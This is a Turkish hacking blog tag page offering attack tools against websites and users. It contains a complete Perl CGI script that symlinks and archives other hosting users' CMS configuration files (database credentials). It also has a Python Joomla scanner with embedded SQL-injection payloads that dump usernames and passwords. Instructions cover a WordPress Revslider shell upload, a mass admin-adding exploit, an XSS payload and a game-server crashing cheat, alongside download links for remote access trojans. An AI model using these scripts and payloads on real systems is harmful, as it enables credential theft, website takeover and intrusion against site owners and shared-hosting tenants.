Hack Tools etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Hack Tools etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
15 Mayıs 2015 Cuma
SpyCronic Rat İndir
Spy Net Rat v2.6 İndir
Toplu config cekme perl - Videolu
Ekleyen:
Admin
Tarih:
Cuma, Mayıs 15, 2015
.htaccess
Kod:Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .pl AddHandler cgi-script .pl AddHandler cgi-script .plKod:ch.pl #!/usr/bin/perl -I/usr/local/bandmin print "Content-type: text/html\n\n"; print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ****** http-equiv="Content-Language" content="en-us" /> ****** http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>SwordFish Priv8 Config</title> <style type="text/css"> .newStyle1 { font-family: Tahoma; font-size: x-large; color: #000000; background-color: #E56717; text-align: center; } </style> </head> '; sub lil{ ($user) = @_; $msr = qx{pwd}; $kola=$msr."/".$user; $kola=~s/\n//g; symlink('/home/'.$user.'/public_html/vb/includes/config.php',$kola.'.txt'); symlink('/home/'.$user.'/public_html/includes/config.php',$kola.'1.txt'); symlink('/home/'.$user.'/public_html/config.php',$kola.'2.txt'); symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'3.txt'); symlink('/home/'.$user.'/public_html/admin/conf.php',$kola.'5.txt'); symlink('/home/'.$user.'/public_html/admin/config.php',$kola.'4.txt'); symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'13.txt'); symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'14.txt'); symlink('/home/'.$user.'/public_html/conf_global.php',$kola.'6.txt'); symlink('/home/'.$user.'/public_html/include/db.php',$kola.'7.txt'); symlink('/home/'.$user.'/public_html/connect.php',$kola.'8.txt'); symlink('/home/'.$user.'/public_html/mk_conf.php',$kola.'9.txt'); symlink('/home/'.$user.'/public_html/configuration.php',$kola.'10.txt'); symlink('/home/'.$user.'/public_html/include/config.php',$kola.'12.txt'); symlink('/home/'.$user.'/public_html/joomla/configuration.php',$kola.'11.txt'); symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'15.txt'); symlink('/home/'.$user.'/public_html/whmc/configuration.php',$kola.'16.txt'); symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'17.txt'); symlink('/home/'.$user.'/public_html/inc/db.php',$kola.'18.txt'); symlink('/home/'.$user.'/public_html/db.php',$kola.'19.txt'); } if ($ENV{'REQUEST_METHOD'} eq 'POST') { read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'}); } else { $buffer = $ENV{'QUERY_STRING'}; } @pairs = split(/&/, $buffer); foreach $pair (@pairs) { ($name, $value) = split(/=/, $pair); $name =~ tr/+/ /; $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $value =~ tr/+/ /; $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $FORM{$name} = $value; } if ($FORM{pass} eq ""){ print ' <body class="newStyle1"> <p>SwordFish Config PerL</p> <p>TopLu Config Cekme</p> <form method="post"> <textarea name="pass" style="width: 543px; height: 420px"></textarea> <br /> <input name="tar" type="text" style="width: 212px" /><br /> <input name="Submit1" type="submit" value="submit" style="width: 99px" /><br /> </form>'; }else{ @lines =<$FORM{pass}>; $y = @lines; open (MYFILE, ">tar.tmp"); print MYFILE "tar -czf ".$FORM{tar}.".tar "; for ($ka=0;$ka<$y;$ka++){ while(@lines[$ka] =~ m/(.*?):x:/g){ &lil($1); print MYFILE $1.".txt "; for($kd=1;$kd<18;$kd++){ print MYFILE $1.$kd.".txt "; } } } print'<body class="newStyle1"> <p>Done !!</p> <p> </p>'; if($FORM{tar} ne ""){ open(INFO, "tar.tmp"); @lines =<INFO> ; close(INFO); system(@lines); print'<p><a href="'.$FORM{tar}.'.tar">Click here 2 download tar file</a></p>'; } } print" </body> </html>";
Video;
Wordpress Revslider Plugins Shell Upload Exploit
Ekleyen:
Admin
Tarih:
Cuma, Mayıs 15, 2015
Bir çok arkadaşın özellikle istediği piyasada benzeri olsada pek bulunmayan kullanışlı bir exploittir.
kullanımı kısaca anlatayım site "http://" ise dosya içinden "http" olanı şeçiniz. "https://" olanlar için diger materyali kullanınız.
Resimdeki gibi " 200 OK " Sonucu aldıgınızda sitenin sonuna
/wp-content/plugins/revslider/temp/update_extract/revslider/x.php yazdıgınızda shelle ulaşmış olursunuz.
pentest.txt
asp shell
upload shelli
2 adet php shell uploadı yapar.
dosyayı incelediginizde anlarsınız zaten
İndir - Download
Devamı...
kullanımı kısaca anlatayım site "http://" ise dosya içinden "http" olanı şeçiniz. "https://" olanlar için diger materyali kullanınız.
Resimdeki gibi " 200 OK " Sonucu aldıgınızda sitenin sonuna
/wp-content/plugins/revslider/temp/update_extract/revslider/x.php yazdıgınızda shelle ulaşmış olursunuz.
pentest.txt
asp shell
upload shelli
2 adet php shell uploadı yapar.
dosyayı incelediginizde anlarsınız zaten
İndir - Download
Etiketler:
Exploitler
,
Hack Tools
,
PC Hacking
,
Security
,
Web Hacking
14 Mayıs 2015 Perşembe
Joomla Scanner v.3 [Python]
Ekleyen:
Admin
Tarih:
Perşembe, Mayıs 14, 2015
Kod: [Seç]
#!/usr/bin/python
# Powered By Dr.AFN[D]ENA
import sys,urllib2,time,httplib
mtucx = 5
dzx = 4
print "joomla Scanner v.3"
print "Gr3etZ to : Makers Hacker Team"
print "pyhthon joomla.py www.site.com"
BAD_RESP = [400,401,404]
def main(path):
print "Scan:",host.split("/",1)[1]+path
try:
h = httplib.HTTP(host.split("/",1)[0])
h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
h.putheader("Host", host.split("/",1)[0])
h.endheaders()
resp, reason, headers = h.getreply()
return resp, reason, headers.get("Server")
except(), msg:
print "Error Occurred:",msg
pass
def timer():
now = time.localtime(time.time())
return time.asctime(now)
dzx = { "index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--" : ["com_idoblog"], "index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--" : ["com_ignitegallery"], "index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=" : ["com_media"], "administrator/components/com_redmystic/chart/tmp-upload-images/" : ["com_redmystic"], "index.php?option=com_users&view=registration" : ["com_user"], "index.php?option=com_jce" : ["JCE","link"], "index.php?option=com_user&view=reset&layout=confirm" : ["com_user"], "index.php?option=com_smartformer":["com_smartformer"],"index.php?option=com_garyscookbook&func=newItem":["com_garyscookbook"],"index.php/component/osproperty/?task=agent_register":["com_osproperty"]}
if len(sys.argv) != 2:
sys.exit(1)
host = sys.argv[1].replace("http://","").rsplit("/",1)[0]
if host[-1] != "/":
host = host+"/"
print "\nTarget:",host
print "\nScanning Exploit\n"
for xpl,(poc) in dzx.items():
resp,reason,server = main(xpl)
if resp not in BAD_RESP:
print ""
print "\nResult:",resp, reason
print "\nVuln",poc
else:
print ""
print "\nResult:",resp, reason
print
print "\nEnd\n"
Etiketler:
Exploitler
,
Hack Tools
,
Web Hacking
Acunetix Kullanımı ve Acunetix ile XSS saldırısı..
Ekleyen:
Admin
Tarih:
Perşembe, Mayıs 14, 2015
Web uygulamalarında, güvenlik açıklarının çok olması sebebi ile bilinen tüm güvenlik açıklarını bir web sayfası üzerinde manüel olarak test etmemiz neredeyse imkânsız denilebilecek bir zaman gerektirmektedir. Gün geçtikçe yeni güvenlik açıkları keşfedilmektedir. Hazırlamış olduğumuz web uygulamasının güvenliği, web uygulamasının çalışmasından çok daha önemlidir. Bir web sitesinin hâlihazırda çalışır halde olması değil, güvenli bir şekilde çalışıyor olması önemlidir.
2008’den bu yana hackerlar saldırılarını sistem ve network hackingden, web hackinge doğru değiştirdiler. Bunun en büyük nedeni, web uygulamalarına yapılan saldırıların daha kolay ve daha çok getirisi olmasıdır. Getiriden kastım, web otomasyon sistemlerinin gün geçtikçe yaygınlaşması, şirketlerin ticari çalışmalarını bu alana yöneltmesidir. Black Hat Hacker olarak nitelendirilen kötü niyetli bilgisayar korsanları, web uygulamalarındaki güvenlik zafiyetlerini kullanarak, elde etmiş oldukları verileri belirli bir çıkar için rakip firmalara yahut bir başka 3’üncü şâhısa satarak gelir elde etmektedirler. Yapılan bu işlem her ne kadar tüm dünyada suç kabul edilse de, bilişim profesyonelleri olarak hazırlamış olduğumuz web sayfalarının veya yönetimini yapmış olduğumuz web sayfalarının güvenliğini sağlamak zorundayız.
Bu makalemizde Acunetix Security Scanner kullanarak, web uygulamaları üzerinde bulunan güvenlik zafiyetlerinin nasıl taranacağını inceleyeceğiz. Makalenin devamı Acunetix Security Scanner’ın kurulduğu varsayılarak anlatılmıştır.
Başlat\Tüm Programlar\Acunetix Web Vulnerability Scanner 7\Acunetix WVS 7 yolundan Acunetix’i çalıştırıyoruz.
Resim-01
Acunetix çalıştırıldığından Resim-01 deki gibi açılacak ve bir süre içerisinde bulunan modülleri yükleyecektir.
Resim-02
Acunetix Web Vulnerability Scanner Resim-02 deki gibi çalışacaktır. Üst kısımda File, Tools, Configuration ve Help olmak üzere 4 adet menü bulunmaktadır.
File kısmında yeni bir güvenlik taraması, tarama raporu çalıştırılabilir. Yâda daha önce kaydedilmiş bir tarama varsa, tarama sonucunu açıp yeniden tarama yaptırılabilir, mevcut bir tarama varsa kaydedilebilir.
Tools kısmı oldukça gelişmiş araçlar barındırmaktadır. Web tarayıcısı, sub domain tarayıcı, http snifer, authentication tester, scheduler gibi birçok aracı barındırmaktadır.
Configuration kısmı, taramalarla ilgili ince ayarların olduğu ve güvenlik zafiyetlerinin ayarlanabildiği tarama profilleri mevcuttur.
Sol taraftaki Tools Explorer kısmı, tools menüsünde ki içeriği göstermektedir. Sağ taraftaki menüler ise, sıklıkla kullanılan araçları göstermektedir.
Her programda olduğu gibi Acunetix’i de ilk başlattığımızda yeni güvenlik zafiyetlerini veritabanına indirmesi için mutlaka update ediyoruz. Bunun için Help kısmında bulunan Check for Update’i tıklıyoruz.
Resim-03
Resim-03’teki gibi güncellemeleri kontrol ettikten sonra, Acunetix’i artık rahatlıkla kullanabiliriz.
Acunetix ile zafiyet tespiti ve zafiyetin kullanımı:
Sol üst köşede bulunan New Scan ya da File menüsünden New\Web Site Scan’i tıklayarak yeni bir tarama oluşturuyoruz.
Resim-04
Scan menüsü, tarama yapmamız için Resim-04’teki gibi bir sihirbaz (wizard) çalıştıracaktır. Website URL kısmına tarama yapacağımız web sitesinin adresini Resim-04’teki alana yazıp Next’i tıklayarak ilerliyoruz.
Resim-05
Select Targets menüsünde tarama yapacağımız sunucu hakkında bilgiler toplanmaktadır. Sunucuda kullanılan yazılım teknolojisi (PHP, ASP, ASP.NET gibi), Web Server (IIS, Apache) gibi bir çok bilgi Resim-05’teki gibi toplanmaktadır. Çeşitli firewall, saldırı tespit, saldırı engelleme sistemi kullanan sunucular üzerinde tarama gerçekleştirildiğinde, Resim-05’teki bilgiler otomatik olarak gelmeyecektir. Bu aşamada sunucu teknolojilerini manuel olarak belirleyip, Next’i tıklıyoruz.
Resim-06
Crawling Options tarama yapacağımız sitede bulunan dosya ve klasörleri tespit etmek üzere çalışır. Bu kısımda herhangi bir değişiklik yapmadan Next’i tıklayın.
Resim-07
Bir sonraki aşama olan Scan Options (Resim-07) kısmı en önemli kısımlardan biridir. Bu kısımda ne tür bir güvenlik taraması yapacağımızı belirtiyoruz. Use this scan profile kısmından tarama profilini seçiyoruz. Bu kısımda bulunan profilleri kendimize göre de oluşturabiliriz. Standartta oluşan profiller de mevcuttur. Scanning mode kısmından tarama modunu seçmeniz gerekir. Burada Quick, Heuristic, ve Extensive olmak üzere 3 tarama tipi mevcuttur. Quick çok hızlı bir tarama gerçekleştirdiği için tercih edilmemelidir. Heuristic siteye göre sezgisel bir tarama gerçekleştirir. Extensive ise genişletilmiş bir tarama sunar. Ancak Extensive modu seçerseniz taramalar biraz uzun sürecektir. Hemen altında http başlık bilgisinin manipüle edilebilmesini sağlamak üzere gerekli seçeği işaretliyoruz. Enable Port Scanning’i deve dışı bırakıp, Enable AcuSensor Technology’i aktif olarak seçip Next’i tıklıyoruz.
Resim-08
Bir sonraki aşamada Forms Authentication (Resim-08) kısmı ile karşılaşıyoruz. Bu kısımda hedef sitenin şifre korumalı alanlarında da güvenlik taraması yapılmasını sağlayabiliriz. Bunun için Record New Login Sequence’i tıklayıp, login sihirbazında ki ilgili yönergeleri takip edebilirsiniz. Ardından Finish kısmı gelinceye kadar Next ile ilerliyoruz.
Finish kısmında yapacağımız tarama ile ilgili genel bilgiler verilecektir. Bu ekranda Finis’i tıklayarak taramayı başlatıyoruz.
Resim09
Tarama Resim-09’daki gibi gerçekleştirilecektir. Tarama sonucu dört aşamada kategorileşecektir. Bunlar, High, Medium, Low ve Informational kategorileridir.
High: Web sitesinde bulunan kritik güvenlik zafiyetlerini göstermektedir.
Medium: Sitede bulunan orta düzeyli güvenlik zafiyetlerini belirtmektedir.
Low: Sitede bulunan düşük düzeyli güvenlik zafiyetlerini belirtmektedir.
Informational: Bu kategori de web sitesinde bulunan bilgilendirmeleri gösterir. Bu kısımdaki alanların birçoğu footprinting evresinde keşfedilmiş bilgileri barındırmaktadır.
Bu kategorilere göre değerlendirecek olursak eğer, tarama yaptığımız sitede 168 adet kritik güvenlik zafiyeti, 3 adet düşük derecede güvenlik zafiyeti ve 50 adet bilgilendirmenin toplandığını görebiliriz. Scan Theread kısmı bunlar için detaylı bilgiler sunmaktadır. Ayrıca Scan Therad kısmında bulunan Site Structure kısmında Acunetix Crawler robotunun site üzerinde keşfettiği dosya ve klasörler bulunmaktadır.
Resim-10
Web Alert kısmında, kırmızı renkle kategorilendirilmiş olan kritik düzeydeki güvenlik zafiyetini açtığımızda, sitede güvenlik zafiyetini barındıran sayfalar aşağı doğru açılacaktır. Resim-10’a bakacak olursak eğer, sitede bulunan zafiyetler 3 sayfadan kaynaklanmaktaymış. Dosya adını tıklayıp açarsak, eğer varsa zafiyetin varyantlarını da gösterecektir. Buna göre …products.php dosyasında 5 adet güvenlik zafiyeti bulunmuş. Bu zafiyetler category query stringinde tespit edilmiş. Yani ….products.php?category= şeklinde kullanılan url satırında XSS saldırısına olanak veren güvenlik zafiyetleri tespit edilmiş. Bu varyantlardan herhangi birini tıklıyoruz. (Ben Resim-10’da category için varyant1’i seçmişim). Varyantları seçtiğimizde hemen sağ tarafta XSS güvenlik açığının nasıl meydana geldiği, bu açığın Acunetix ile nasıl tespit edildiği, açığın kullanılmasına olanak sağlayan menüler ve açığın nasıl kapatılacağına ilişkin bilgilendirmeler açılacaktır. Bulunan güvenlik zafiyetinin test edilebilmesi için Acunetix içerinde yerleşik bir modül mevcuttur. Bu modül tüm kritik zafiyetlerde rahatlıkla kullanılabilir. Güvenlik zafiyetini test etmek için sağ tarafta bulunan bilgilendirici kısımda yer alan View HTTP headers’ı tıklıyoruz.
Resim-11
View HTTP headers menüsü zafiyet ile ilgili olarak yukarıdaki teknik bilgileri vermektedir. Buna göre siteye düzenlenecek olan XSS saldırı …..products.php?category=1--> 1<ScRiPt >prompt(900710)</ScRiPt> <!-- şeklinde gerçekleştirilebilir. Yukarıdaki kodu siteye yapıştırıp test ettiğimizde, sitede XSS zafiyetinin oluştuğunu görebiliriz. Bu uygulamamız bir Reflected XSS saldırısı örneğidir. XSS saldırıları ve benzeri saldırılar Acunetix ile bu şekilde gerçekleştirilebilir. Yahut web sitenizin güvenliğini Acunetix kullanarak bu şekilde test edebilirsiniz.
Metin2 Pvp Server Hackleme
Ekleyen:
Admin
Tarih:
Perşembe, Mayıs 14, 2015
Yazılı Anlatım
1. Hilemizi indiriyoruz & kurulumu yapıyoruz.
2. Hilemizi açıyoruz gelen ekrandaki yerde "Devam" butonuna basıyoruz.
3. Karşımıza çıkan yerde IP Adresi gizlemek istiyorsanız o kutucuğa tıklayın.
4. Ve Kodu Oluştur butonuna basıyoruz.
5. Program sizin sisteminize göre bir dice kodu oluşturdu.
6. Oluşan kodu bir yere kopyalıyoruz veya programı açık bırakıyoruz.
7. PVP Serverimizi seçip oyunumuza giriyoruz.
8. Program size hangi kodları verdiyse o kodları giriyorsunuz.
9. Server kapatılmış oluyor, ve işlem başarıyla tamamlanıyor.
10. Hileyi kullanırken yaptığınız herşey sizin sorumluluğunuz altındadır.
Videolu Anlatım
Metin2 Server Kapatma Hilesi - Programı - YouTube
PROGRAMDAN BİR GÖRÜNTÜ

Dreamfancy Core Hack.exe - 4.7 MB
Devamı...
1. Hilemizi indiriyoruz & kurulumu yapıyoruz.
2. Hilemizi açıyoruz gelen ekrandaki yerde "Devam" butonuna basıyoruz.
3. Karşımıza çıkan yerde IP Adresi gizlemek istiyorsanız o kutucuğa tıklayın.
4. Ve Kodu Oluştur butonuna basıyoruz.
5. Program sizin sisteminize göre bir dice kodu oluşturdu.
6. Oluşan kodu bir yere kopyalıyoruz veya programı açık bırakıyoruz.
7. PVP Serverimizi seçip oyunumuza giriyoruz.
8. Program size hangi kodları verdiyse o kodları giriyorsunuz.
9. Server kapatılmış oluyor, ve işlem başarıyla tamamlanıyor.
10. Hileyi kullanırken yaptığınız herşey sizin sorumluluğunuz altındadır.
Videolu Anlatım
Metin2 Server Kapatma Hilesi - Programı - YouTube
PROGRAMDAN BİR GÖRÜNTÜ
Dreamfancy Core Hack.exe - 4.7 MB
Darcomet Rat İndir
WordPress 0day Add Admin Mass Exploiting
Ekleyen:
Admin
Tarih:
Perşembe, Mayıs 14, 2015
Wordpress Yeni Admin Ekleme Açıgı !
Açık 1337day'da Paylaşılmıştır Exploit İle Toplu Bir Şekilde Bunu Yapabiliriz.
http://1337day.com/exploit/22660 => Açık
Exploit Kullanımı :
php exploit.php listw.txt themes
liste.txt : Site Listesi
themes : Açıklı Tema
themes : Açıklı Tema
Kullanımı Bu Şekildedir.
"here ur email" yazan kısma kendi mail adresinizi yazın
"appius" Örnek tema ismidir. siz kullandıgınız açıklı temayı yazacaksınız.
Kaydol:
Kayıtlar
(
Atom
)






